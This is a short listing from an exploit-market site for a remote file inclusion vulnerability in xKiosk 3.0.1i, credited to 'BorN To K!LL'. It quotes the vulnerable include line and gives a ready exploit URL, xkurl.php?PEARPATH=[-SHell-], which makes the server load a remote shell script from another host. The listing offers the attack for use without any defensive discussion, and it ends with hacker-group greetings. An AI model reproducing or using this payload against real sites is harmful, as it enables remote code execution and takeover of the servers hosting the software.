[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

xKiosk 3.0.1i (xkurl.php PEARPATH) Remote File Inclusion Vulnerability

Author
BorN To K!LL
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2206
Category
web applications
Date add
07-10-2007
Platform
unsorted
======================================================================
xKiosk 3.0.1i (xkurl.php PEARPATH) Remote File Inclusion Vulnerability
======================================================================



xKiosk WEB <= (PEARPATH) Remote File Include Vulnerability

Script : xKiosk WEB

Version : 3.0.1i

Download : http://xkiosk.net/xkiosk.3.0.1j.web.zip

AUTHOR : BorN To K!LL

Vuln Code :

include($PEARPATH.'Client.php');

3xpl0!T :

[p4th]/system/funcs/xkurl.php?PEARPATH=[-SHell-]

Greetings 2 :

str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ..

BorN To K!LL <> GoLd_M = 4ever ... =P




#  0day.today [2024-12-25]  #